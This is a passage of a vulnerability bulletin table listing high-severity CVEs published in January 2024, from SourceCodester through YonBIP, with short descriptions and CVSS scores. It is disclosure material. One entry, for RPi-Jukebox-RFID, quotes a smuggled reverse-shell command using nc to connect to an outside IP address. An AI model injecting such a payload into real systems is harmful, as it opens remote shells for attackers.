mayurik — online_tours_\&_travels_management_system | A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0735 [email protected] [email protected] [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | 2024-01-26 | 9.6 | CVE-2024-21326 [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | 2024-01-26 | 8.3 | CVE-2024-21385 [email protected] |
mintplexlabs — anythingllm | AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 7.5 | CVE-2024-22422 [email protected] [email protected] |
monitorr — monitorr | A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 8.8 | CVE-2024-0713 [email protected] [email protected] [email protected] |
motorola — mr2600 | A command injection vulnerability exists in the ‘SaveSysLogParams’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23626 [email protected] |
motorola — mr2600 | A command injection vulnerability exists in the ‘SaveStaticRouteIPv4Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23627 [email protected] |
motorola — mr2600 | A command injection vulnerability exists in the ‘SaveStaticRouteIPv6Params’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23628 [email protected] |
motorola — mr2600 | An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information. | 2024-01-26 | 9.6 | CVE-2024-23629 [email protected] |
motorola — mr2600 | An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed. | 2024-01-26 | 9 | CVE-2024-23630 [email protected] |
mypresta — manufacturers_\(brands\)_images_block | In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection. | 2024-01-19 | 9.8 | CVE-2023-46351 [email protected] [email protected] |
nautobot — nautobot | Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2. | 2024-01-23 | 7.1 | CVE-2024-23345 [email protected] [email protected] [email protected] [email protected] [email protected] |
ncr — terminal_handler | Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component. | 2024-01-20 | 8.8 | CVE-2023-47024 [email protected] [email protected] |
netapp — ontap_9 | ONTAP 9 versions prior to 9.9.1P18, 9.10.1P16, 9.11.1P13, 9.12.1P10 and 9.13.1P4 are susceptible to a vulnerability which could allow an authenticated user with multiple remote accounts with differing roles to perform actions via REST API beyond their intended privilege. Possible actions include viewing limited configuration details and metrics or modifying limited settings, some of which could result in a Denial of Service (DoS). | 2024-01-26 | 7.6 | CVE-2024-21985 [email protected] |
nextendweb — smart_slider_3 | Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9. | 2024-01-19 | 8.8 | CVE-2022-45845 [email protected] |
nvidia — bluefield_2_dpu_bmc_bluefield_3_dpu_bmc | NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS. | 2024-01-24 | 7.2 | CVE-2023-31037 [email protected] |
omron — cj-series_and_cs-series_cpu_modules | The Omron FINS protocol has an authenticated feature to prevent access to memory regions. Authentication is susceptible to bruteforce attack, which may allow an adversary to gain access to protected memory. This access can allow overwrite of values including programmed logic. | 2024-01-22 | 8.6 | CVE-2022-45790 [email protected] [email protected] [email protected] |
omron — sysmac_studio | Project files may contain malicious contents which the software will use to create files on the filesystem. This allows directory traversal and overwriting files with the privileges of the logged-in user. | 2024-01-22 | 7.8 | CVE-2022-45792 [email protected] |
openlibraryfoundation — mod-data-export-spring | Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines. | 2024-01-19 | 9.1 | CVE-2024-23687 [email protected] [email protected] [email protected] [email protected] [email protected] |
openvswitch — openvswitch | openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c. | 2024-01-19 | 7.5 | CVE-2024-22563 [email protected] |
orthanc — osimis_dicom_web_viewer | A XSS payload can be uploaded as a DICOM study and when a user tries to view the infected study inside the Osimis WebViewer the XSS vulnerability gets triggered. If exploited, the attacker will be able to execute arbitrary JavaScript code inside the victim’s browser. | 2024-01-23 | 7.1 | CVE-2023-7238 [email protected] |
pcman_ftp_server_project — pcman_ftp_server | A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability. | 2024-01-19 | 7.5 | CVE-2024-0731 [email protected] [email protected] [email protected] |
pcman_ftp_server_project — pcman_ftp_server | A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555. | 2024-01-19 | 7.5 | CVE-2024-0732 [email protected] [email protected] [email protected] |
peteroupc — cbor | Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application’s use of this library, this may be a remote attacker. | 2024-01-19 | 7.5 | CVE-2024-23684 [email protected] [email protected] [email protected] |
pimcore — admin-ui-classic-bundle | Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue. | 2024-01-24 | 8.8 | CVE-2024-23646 [email protected] [email protected] [email protected] [email protected] [email protected] |
pimcore — admin-ui-classic-bundle | Pimcore’s Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password. The URL sent contains a unique token, valid during 24 hours, allowing the user to reset its password. This token is highly sensitive; as an attacker able to retrieve it would be able to resets the user’s password. Prior to version 1.2.3, the reset-password URL is crafted using the “Host” HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a “Host” header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue. | 2024-01-24 | 8.8 | CVE-2024-23648 [email protected] [email protected] |
prestashopmodules — sliding_cart_block | In the module “Sliding cart block” (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection. | 2024-01-19 | 9.8 | CVE-2023-50028 [email protected] [email protected] |
projectworlds — online_time_table_generator | A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0730 [email protected] [email protected] [email protected] |
properfraction — profilepress | Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress. This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2. | 2024-01-19 | 7.2 | CVE-2022-45083 [email protected] |
prosshd — prosshd | A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548. | 2024-01-19 | 7.5 | CVE-2024-0725 [email protected] [email protected] [email protected] |
python — pillow | Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter). | 2024-01-19 | 8.1 | CVE-2023-50447 [email protected] [email protected] [email protected] [email protected] |
quantumcloud — chatbot_with_ai | Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI. This issue affects ChatBot with AI: from n/a through 5.1.0. | 2024-01-24 | 8.7 | CVE-2024-22309 [email protected] |
red-hat — quarkus | A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security. | 2024-01-25 | 8.6 | CVE-2023-6267 [email protected] [email protected] |
red_hat — libtiff | An out-of-memory flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFRasterScanlineSize64() API. This flaw allows a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB. | 2024-01-25 | 7.5 | CVE-2023-52355 [email protected] [email protected] [email protected] |
red_hat — libtiff | A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service. | 2024-01-25 | 7.5 | CVE-2023-52356 [email protected] [email protected] [email protected] [email protected] |
red_hat — ovirt-engine | An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command. | 2024-01-25 | 9.1 | CVE-2024-0822 [email protected] [email protected] |
red_hat — shim | A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. | 2024-01-25 | 8.3 | CVE-2023-40547 [email protected] [email protected] [email protected] |
smsot — smsot | A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556. | 2024-01-19 | 9.8 | CVE-2024-0733 [email protected] [email protected] [email protected] |
smsot — smsot | A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability. | 2024-01-19 | 9.8 | CVE-2024-0734 [email protected] [email protected] [email protected] |
snp_digital — salesking | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing. This issue affects SalesKing: from n/a through 1.6.15. | 2024-01-24 | 7.5 | CVE-2024-22154 [email protected] |
sofastack — sofa-rpc | SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue. | 2024-01-23 | 9.8 | CVE-2024-23636 [email protected] [email protected] |
soflyy — export_any_wordpress_data_to_xml\/csv | The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution. | 2024-01-22 | 7.2 | CVE-2023-7082 [email protected] |
sourcefabric — phoniebox | A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 9.8 | CVE-2024-0714 [email protected] [email protected] |
splashtop — splashtop_software_updater | The C:\Program Files (x86)\Splashtop\Splashtop Software Updater\uninst.exe process creates a folder at C:\Windows\Temp~nsu.tmp and copies itself to it as Au_.exe. The C:\Windows\Temp~nsu.tmp\Au_.exe file is automatically launched as SYSTEM when the system reboots or when a standard user runs an MSI repair using Splashtop Streamer’s Windows Installer. Since the C:\Windows\Temp~nsu.tmp folder inherits permissions from C:\Windows\Temp and Au_.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges. | 2024-01-25 | 7.8 | CVE-2023-3181 [email protected] |
splunk — splunk_enterprise | In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows. | 2024-01-22 | 7.5 | CVE-2024-23678 [email protected] [email protected] |
spring — spring_framework | In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions. | 2024-01-22 | 7.5 | CVE-2024-22233 [email protected] |
sunnytoo — stblogsearch | SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component. | 2024-01-19 | 9.8 | CVE-2023-43985 [email protected] [email protected] |
sveltejs — kit | SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body eg `{}` to a built and previewed/hosted sveltekit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue. | 2024-01-24 | 7.5 | CVE-2024-23641 [email protected] [email protected] |
swftools — swftools | swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c. | 2024-01-19 | 7.8 | CVE-2024-22562 [email protected] |
swftools — swftools | A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602. | 2024-01-19 | 7.8 | CVE-2024-22911 [email protected] |
swftools — swftools | A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22912 [email protected] |
swftools — swftools | A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22913 [email protected] |
swftools — swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution. | 2024-01-19 | 7.8 | CVE-2024-22915 [email protected] |
swftools — swftools | swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587. | 2024-01-19 | 7.8 | CVE-2024-22919 [email protected] |
swftools — swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c. | 2024-01-19 | 7.8 | CVE-2024-22920 [email protected] |
swftools — swftools | swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576. | 2024-01-19 | 7.8 | CVE-2024-22955 [email protected] |
swftools — swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838 | 2024-01-19 | 7.8 | CVE-2024-22956 [email protected] |
symantec — data_loss_prevention | A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution. | 2024-01-26 | 9.6 | CVE-2024-23617 [email protected] |
symantec — deployment_solution | A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. | 2024-01-26 | 10 | CVE-2024-23613 [email protected] |
symantec — messaging_gateway | A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 9.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. | 2024-01-26 | 10 | CVE-2024-23614 [email protected] |
symantec — messaging_gateway | A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 10.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. | 2024-01-26 | 10 | CVE-2024-23615 [email protected] |
symantec — server_management_suite | A buffer overflow vulnerability exists in Symantec Server Management Suite version 7.9 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. | 2024-01-26 | 10 | CVE-2024-23616 [email protected] |
systemk_ — nvr_504 | SystemK NVR 504/508/516 versions 2.3.5SK.30084998 and prior are vulnerable to a command injection vulnerability in the dynamic domain name system (DDNS) settings that could allow an attacker to execute arbitrary commands with root privileges. | 2024-01-25 | 9.8 | CVE-2023-7227 [email protected] |
technicolor — tc8715d_firmware | Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords. | 2024-01-22 | 8.8 | CVE-2023-47352 [email protected] [email protected] [email protected] [email protected] |
thomas_belser — asgaros_forum | Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum. This issue affects Asgaros Forum: from n/a through 2.7.2. | 2024-01-24 | 8.7 | CVE-2024-22284 [email protected] |
tlsfuzzer — python-ecdsa | The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists. | 2024-01-23 | 7.4 | CVE-2024-23342 [email protected] [email protected] [email protected] [email protected] |
trendnet — tew-800mb | A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.2 | CVE-2024-0918 [email protected] [email protected] [email protected] |
trendnet — tew-815dap | A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 8.8 | CVE-2024-0919 [email protected] [email protected] [email protected] |
trendnet — tew-822dre | A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 7.2 | CVE-2024-0920 [email protected] [email protected] [email protected] |
tutao — tutanota | Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue. | 2024-01-25 | 7.5 | CVE-2024-23655 [email protected] [email protected] |
ukrsolution — barcode_scanner_and_inventory_manager | Unrestricted Upload of File with Dangerous Type vulnerability in UkrSolution Barcode Scanner and Inventory manager. This issue affects Barcode Scanner and Inventory manager: from n/a through 1.5.1. | 2024-01-24 | 10 | CVE-2023-52221 [email protected] |
uniview– isc | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. | 2024-01-22 | 8 | CVE-2024-0778 [email protected] [email protected] [email protected] |
unix4lyfe — darkhttpd | darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel. | 2024-01-22 | 9.8 | CVE-2024-23771 [email protected] [email protected] [email protected] |
vite — vite | Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 — with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn’t discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in [email protected], [email protected], [email protected], and [email protected]. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers. | 2024-01-19 | 7.5 | CVE-2024-23331 [email protected] [email protected] [email protected] |
weaver — e-cology | An issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component. | 2024-01-20 | 9.8 | CVE-2023-51892 [email protected] [email protected] [email protected] |
webtoffee — order_export_&_order_import_for_woocommerce | Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Order Export & Order Import for WooCommerce. This issue affects Order Export & Order Import for WooCommerce: from n/a through 2.4.3. | 2024-01-24 | 8 | CVE-2024-22135 [email protected] |
webtoffee — product_import_export_for_woocommerce | Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce. This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7. | 2024-01-24 | 8 | CVE-2024-22152 [email protected] |
webtoffee — stripe_payment_plugin_for_woocommerce | The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘id’ parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-01-19 | 7.5 | CVE-2024-0705 [email protected] [email protected] |
wordpress — wordpress | Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6. | 2024-01-19 | 8.2 | CVE-2022-40700 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
wordpress — wordpress | The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-20 | 7.2 | CVE-2023-7063 [email protected] [email protected] |
wp_overnight — pdf_invoices_&_packing_slips_for_woocommerce | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WP Overnight PDF Invoices & Packing Slips for WooCommerce. This issue affects PDF Invoices & Packing Slips for WooCommerce: from n/a through 3.7.5. | 2024-01-27 | 7.6 | CVE-2024-22147 [email protected] |
xlightftpd — xlight_ftp_server | A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560. | 2024-01-19 | 7.5 | CVE-2024-0737 [email protected] [email protected] [email protected] |
xpand-it — write-back_manager | An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file. | 2024-01-19 | 9.8 | CVE-2023-27168 [email protected] [email protected] [email protected] [email protected] |
yonyou — yonbip | An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component. | 2024-01-20 | 9.8 | CVE-2023-51906 [email protected] [email protected] [email protected] |
yonyou — yonbip | An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51924 [email protected] [email protected] [email protected] |
yonyou — yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51925 [email protected] [email protected] [email protected] |
yonyou — yonbip | YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method. | 2024-01-20 | 9.8 | CVE-2023-51927 [email protected] [email protected] [email protected] |
yonyou — yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51928 [email protected] [email protected] [email protected] |
yonyou — yonbip | YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component. | 2024-01-20 | 7.5 | CVE-2023-51926 [email protected] [email protected] [email protected] |
Medium Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
